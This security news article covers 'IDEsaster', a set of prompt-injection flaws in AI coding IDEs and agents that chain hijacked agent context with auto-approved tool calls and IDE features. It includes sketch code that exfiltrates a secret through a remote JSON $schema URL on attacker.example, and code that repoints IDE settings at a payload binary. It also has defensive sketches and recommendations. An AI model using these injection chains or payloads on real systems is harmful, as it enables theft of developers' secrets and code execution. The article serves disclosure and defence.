A recent investigation has revealed more than 30 security vulnerabilities in several Integrated Development Environments (IDEs) powered by artificial intelligence (AI). These flaws, collectively called “IDEsaster”, combine prompt injection primitives with legitimate IDE features to achieve data exfiltration and remote code execution (RCE).

Security researcher Ari Marzouk (MaccariTA) found that the flaws affect popular IDEs and extensions such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, JetBrains Junie, and Cline, among others. Of these, 24 vulnerabilities have been assigned CVE identifiers.

The IDEsaster attack chain

The research highlights that AI IDEs and coding assistants underestimate the security risks of integrating autonomous AI agents. An “IDEsaster” attack chains three main vectors:

  1. LLM Guardrails Bypass: Prompt injection is used to hijack the large language model (LLM) context and force it to execute the attacker’s instructions.
  2. Self-approved tool calls: The AI agent performs actions without requiring user interaction, using tool calls that are configured to self-approve.
  3. Abuse of legitimate IDE features: The attacker exploits normal IDE features to break the security boundary, allowing leakage of sensitive data or execution of arbitrary commands.

Unlike previous attacks that abused vulnerable tools, IDEsaster uses prompt injection to activate legitimate features of the IDE.

Context Hijacking Methods and Attack Examples

Context hijacking can be achieved in several ways, such as including external references (URLs, pasted text) with hidden characters invisible to the human eye, but parsable by the LLM. It can also occur by poisoning the Model Context Protocol (MCP) via “rug pulls” or when a legitimate MCP server processes attacker-controlled input from an external source.
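
To make the hidden-character vector concrete, the following is a minimal sketch (not from the original research) of how pasted text could be scanned for invisible Unicode characters that an LLM would still parse; the heuristic and sample string are illustrative assumptions.

```python
import unicodedata

# Zero-width characters, bidi controls, and Unicode "tag" characters can hide
# instructions from a human reviewer while an LLM still parses them.
def find_hidden_characters(text: str) -> list[tuple[int, str]]:
    """Return (index, character name) for invisible format characters."""
    hits = []
    for i, ch in enumerate(text):
        # Category "Cf" (format) covers zero-width spaces, bidi controls,
        # and the invisible tag characters in U+E0000-U+E007F.
        if unicodedata.category(ch) == "Cf":
            hits.append((i, unicodedata.name(ch, f"U+{ord(ch):04X}")))
    return hits

if __name__ == "__main__":
    # A zero-width space (U+200B) hides between the two words below.
    sample = "review\u200bthis file"
    for index, name in find_hidden_characters(sample):
        print(f"hidden character at index {index}: {name}")
```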

Specific attacks identified include:

  • Data exfiltration via remote JSON: An attacker uses prompt injection to make the agent read a sensitive file with tools such as read_file or search_files. The agent then uses a legitimate tool (write_file or edit_file) to write a JSON file that references a remote JSON schema hosted on a malicious domain. When the IDE processes this file, it issues a GET request to the attacker’s domain, exfiltrating the data (see the sketch after this list).
    • CVEs affected: CVE-2025-49150 (Cursor), CVE-2025-53097 (Roo Code), CVE-2025-58335 (JetBrains Junie), GitHub Copilot, Kiro.dev, Claude Code.
  • Remote Code Execution (RCE) via IDE Configuration: Prompt injection is used to edit IDE configuration files (for example, .vscode/settings.json or .idea/workspace.xml). Modifying parameters such as php.validate.executablePath or PATH_TO_GIT to point to a malicious executable yields RCE when the environment or the corresponding tool starts (illustrated in the second sketch below).
    • CVEs affected: CVE-2025-53773 (GitHub Copilot), CVE-2025-54130 (Cursor), CVE-2025-53536 (Roo Code), CVE-2025-55012 (Zed.dev), Claude Code.
  • RCE via workspace configuration: Prompt injection is used to edit workspace configuration files (*.code-workspace) and reconfigure a multi-root workspace, achieving RCE.
    • CVEs affected: CVE-2025-64660 (GitHub Copilot), CVE-2025-61590 (Cursor), CVE-2025-58372 (Roo Code).
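
As an illustration of the remote-schema primitive described above, here is a minimal sketch of the file a hijacked agent could produce; the attacker domain, file names, and placeholder secret are all invented for this example.

```python
import json
import pathlib

# Sketch of the exfiltration payload: a JSON file whose "$schema" URL points
# at an attacker-controlled host, with the stolen value smuggled into the
# query string. When the IDE validates the file against its schema, it issues
# a GET request that delivers the secret. Domain and paths are hypothetical.
def build_exfil_file(secret: str) -> dict:
    return {
        "$schema": f"https://attacker.example/schema.json?d={secret}",
        "name": "innocuous-config",
    }

if __name__ == "__main__":
    secret = "AKIA-EXAMPLE-KEY"  # stands in for content read via read_file
    payload = build_exfil_file(secret)
    pathlib.Path("config.json").write_text(json.dumps(payload, indent=2))
```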

These RCE attacks often rely on the AI agent auto-approving file writes, a default behavior for files within the workspace; the sketch below shows how small such a write can be.
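
The following is a hypothetical sketch of the configuration edit behind the settings-based RCE; the payload path is invented, and a real attack would be delivered through the agent’s write_file/edit_file tools rather than a standalone script.

```python
import json
import pathlib

# Hypothetical illustration of the configuration-write primitive: one
# auto-approved write to .vscode/settings.json repoints the PHP validator
# at an attacker-controlled binary, which the IDE will later execute.
def poison_workspace_settings(workspace: pathlib.Path) -> None:
    settings_path = workspace / ".vscode" / "settings.json"
    settings_path.parent.mkdir(parents=True, exist_ok=True)
    settings = json.loads(settings_path.read_text()) if settings_path.exists() else {}
    settings["php.validate.executablePath"] = "/tmp/payload"  # invented path
    settings_path.write_text(json.dumps(settings, indent=2))

if __name__ == "__main__":
    poison_workspace_settings(pathlib.Path("."))
```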

Recommendations and a new paradigm: “Secure for AI”

Marzouk highlights the need for a new security paradigm, “Secure for AI,” which addresses the emerging risks introduced when AI components are integrated into existing products.

Recommendations for developers:

  • Apply the principle of least privilege to LLM tools (see the sketch after this list).
  • Minimize prompt injection vectors and harden the system prompt.
  • Use sandboxing to execute commands.
  • Perform extensive security testing against path manipulation, information leakage, and command injection.
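
As a rough illustration of the first recommendation, the sketch below gates agent tool calls behind an allowlist and explicit confirmation; the names and policies are invented for this example and are not an actual IDE API.

```python
import shlex
import subprocess

# Illustrative least-privilege policy: writes are auto-approved only inside
# an allowlist, and sensitive files or shell commands always require the
# user's confirmation. All prefixes and file names below are assumptions.
SAFE_WRITE_PREFIXES = ("src/", "docs/")
SENSITIVE_FILES = {".vscode/settings.json", ".idea/workspace.xml"}

def approve_write(path: str) -> bool:
    """Gate an agent file write: auto-approve only clearly benign paths."""
    if path in SENSITIVE_FILES or not path.startswith(SAFE_WRITE_PREFIXES):
        return input(f"Agent wants to write {path!r}. Allow? [y/N] ").strip().lower() == "y"
    return True

def run_command(cmd: str) -> None:
    """Never self-approve shell commands; always ask the user first."""
    if input(f"Agent wants to run {cmd!r}. Allow? [y/N] ").strip().lower() != "y":
        raise PermissionError("command rejected by user")
    subprocess.run(shlex.split(cmd), check=True, timeout=30)
```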

Recommendations for users:

  • Use AI IDEs and AI agents only with trusted projects and files.
  • Manually review added sources (e.g. URLs) for hidden instructions (such as HTML comments or invisible Unicode characters).
  • Continuously monitor trusted MCP servers, as even a trusted server can be compromised (see the sketch after this list).
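
To illustrate the last point, here is a minimal sketch of rug-pull detection that fingerprints a server’s tool definitions between sessions; how definitions are fetched and where fingerprints are stored is left out, and nothing here is a real MCP client API.

```python
import hashlib
import json

# Fingerprint each MCP server's tool definitions and alert when they change
# between sessions, which may indicate a "rug pull".
def fingerprint(tool_definitions: list[dict]) -> str:
    canonical = json.dumps(tool_definitions, sort_keys=True)
    return hashlib.sha256(canonical.encode()).hexdigest()

def check_server(name: str, tool_definitions: list[dict], known: dict[str, str]) -> None:
    digest = fingerprint(tool_definitions)
    previous = known.get(name)
    if previous is None:
        known[name] = digest  # trust on first use
    elif previous != digest:
        raise RuntimeError(f"MCP server {name!r} changed its tools: possible rug pull")

if __name__ == "__main__":
    known: dict[str, str] = {}
    tools = [{"name": "read_file", "description": "Read a file from disk"}]
    check_server("example-server", tools, known)            # first sight: recorded
    tools[0]["description"] = "Read a file and report it"   # definition changed
    check_server("example-server", tools, known)            # raises RuntimeError
```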

Conclusions

The findings from “IDEsaster” demonstrate how AI tools that fail to distinguish between user instructions and malicious external content expand the attack surface of development machines. Integrating AI agents into existing applications (such as IDEs or CI/CD pipelines) introduces new risks that demand a proactive, adapted security approach.

References

  • CVE-2025-49150 (Cursor)
  • CVE-2025-53097 (Roo Code)
  • CVE-2025-58335 (JetBrains Junie)
  • CVE-2025-53773 (GitHub Copilot)
  • CVE-2025-54130 (Cursor)
  • CVE-2025-53536 (Roo Code)
  • CVE-2025-55012 (Zed.dev)
  • CVE-2025-64660 (GitHub Copilot)
  • CVE-2025-61590 (Cursor)
  • CVE-2025-58372 (Roo Code)
  • CVE-2025-61260 (OpenAI Codex CLI)